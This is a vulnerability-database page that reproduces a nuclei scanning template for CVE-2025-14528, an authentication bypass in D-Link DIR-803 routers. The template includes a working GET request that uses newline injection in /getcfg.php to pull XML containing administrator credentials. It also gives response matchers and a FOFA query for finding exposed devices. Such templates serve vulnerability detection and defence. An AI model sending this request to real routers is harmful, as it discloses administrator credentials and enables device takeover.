Lucene search
K

D-Link DIR-803 - Authentication Bypass

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 13 Views

Authentication bypass in D-Link DIR-803 allows retrieving administrator credentials via newline injection in /getcfg.php.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2025-14528
11 Dec 202517:39
circl
CNNVD
D-Link DIR-803 安全漏洞
11 Dec 202500:00
cnnvd
CNVD
D-Link DIR-803 Information Disclosure Vulnerability
18 Dec 202500:00
cnvd
CVE
CVE-2025-14528
11 Dec 202517:02
cve
Cvelist
CVE-2025-14528 D-Link DIR-803 Configuration getcfg.php information disclosure
11 Dec 202517:02
cvelist
EUVD
EUVD-2025-202757
11 Dec 202517:02
euvd
Nuclei
Jinher OA - SQL Injection
6 Jul 202603:02
nuclei
NVD
CVE-2025-14528
11 Dec 202517:15
nvd
OSV
CVE-2025-14528
11 Dec 202517:15
osv
Positive Technologies
PT-2025-50639
11 Dec 202500:00
ptsecurity
Rows per page
id: CVE-2025-14528

info:
  name: D-Link DIR-803 - Authentication Bypass
  author: DhiyaneshDk
  severity: high
  description: |
    An authentication bypass vulnerability exists in D-Link DIR-803 routers (firmware A1 1.04 and earlier). By manipulating the AUTHORIZED_GROUP parameter in /getcfg.php via newline injection, an attacker can retrieve XML configuration containing administrator credentials without authentication.
  impact: |
    Remote attackers can disclose sensitive information, potentially compromising device confidentiality.
  remediation: |
    Upgrade to the latest supported version or replace the device as it is no longer maintained.
  reference:
    - https://github.com/Madgeaaaaa/MY_VULN_2/blob/main/D-Link/vuln-2/DIR-803%20Authentication%20Bypass.md
    - https://vuldb.com/?id.335869
    - https://nvd.nist.gov/vuln/detail/CVE-2025-14528
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-14528
    epss-score: 0.03559
    epss-percentile: 0.87927
    cwe-id: CWE-200
  metadata:
    max-request: 1
    verified: true
    fofa-query: app="D_Link-DIR-803"
  tags: cve,cve2025,d-link,dir,auth-bypass,disclosure,vkev

http:
  - raw:
      - |
        GET /getcfg.php?a=%0A_POST_SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1' HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<entry>"
          - "<account>"
          - "<group>"
        condition: and

      - type: word
        part: content_type
        words:
          - "text/xml"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220643c74149609559c459db0e22f7a3165c0f55bff14a178f566dcf26fac84bd0e022100a86133da5140bc5da9c268a3784485af4efd9c7aa00496cb4c70b59d5e643379:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

10 Feb 2026 13:39Current
6.5Medium risk
Vulners AI Score6.5
CVSS 3.15.3 - 7.5
CVSS 25
CVSS 46.9
CVSS 35.3
EPSS0.03559
SSVC
13